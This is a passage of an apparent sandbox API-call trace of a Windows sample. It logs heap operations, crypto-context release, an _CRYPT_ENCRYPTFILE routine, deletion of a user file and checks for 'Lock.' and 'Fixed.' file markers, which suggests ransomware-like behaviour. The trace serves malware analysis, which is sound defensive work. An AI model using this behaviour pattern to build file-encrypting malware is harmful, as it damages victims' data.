RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0238.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0238.038] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0238.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.039] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0238.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0238.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.040] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.040] FreeLibrary (hLibModule=0x756e0000) returned 1 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0238.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.040] CloseHandle (hObject=0x2d0) returned 1 [0238.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.082] CloseHandle (hObject=0x2a0) returned 1 [0238.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.088] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.088] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.089] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/qFOBP8FwJiuKVs.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi", lpFilePart=0x8cedf4*="qFOBP8FwJiuKVs.avi") returned 0x32 [0238.089] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qfobp8fwjiukvs.avi")) returned 0x20 [0238.089] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefebe90, ftCreationTime.dwHighDateTime=0x1d5e35c, ftLastAccessTime.dwLowDateTime=0xdc66c0d0, ftLastAccessTime.dwHighDateTime=0x1d5e8d4, ftLastWriteTime.dwLowDateTime=0xdc66c0d0, ftLastWriteTime.dwHighDateTime=0x1d5e8d4, nFileSizeHigh=0x0, nFileSizeLow=0xd667, dwReserved0=0x1, dwReserved1=0x1c, cFileName="qFOBP8FwJiuKVs.avi", cAlternateFileName="QFOBP8~1.AVI")) returned 0xa87310 [0238.089] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qfobp8fwjiukvs.avi")) returned 1 [0238.276] FindNextFileW (in: hFindFile=0xa87310, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefebe90, ftCreationTime.dwHighDateTime=0x1d5e35c, ftLastAccessTime.dwLowDateTime=0xdc66c0d0, ftLastAccessTime.dwHighDateTime=0x1d5e8d4, ftLastWriteTime.dwLowDateTime=0xdc66c0d0, ftLastWriteTime.dwHighDateTime=0x1d5e8d4, nFileSizeHigh=0x0, nFileSizeLow=0xd667, dwReserved0=0x1, dwReserved1=0x1c, cFileName="qFOBP8FwJiuKVs.avi", cAlternateFileName="QFOBP8~1.AVI")) returned 0 [0238.276] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0238.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0238.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0238.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0238.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0238.276] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0238.277] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0238.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x66) returned 0x2e564e0 [0238.277] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/qFOBP8FwJiuKVs.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi", lpFilePart=0x8cf650*="qFOBP8FwJiuKVs.avi") returned 0x32 [0238.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0238.278] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\qFOBP8FwJiuKVs.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qfobp8fwjiukvs.avi")) returned 0xffffffff [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0238.278] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0238.278] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.278] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0238.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0238.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R2j101Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2j101Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j101Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="101Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="01Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rhh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hh.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0238.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0238.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0238.280] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0238.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0238.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0238.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0238.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R2j101Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2j101Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j101Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="101Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="01Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0238.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rhh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hh.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0238.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0238.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0238.281] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0238.282] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0238.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0238.282] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0238.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 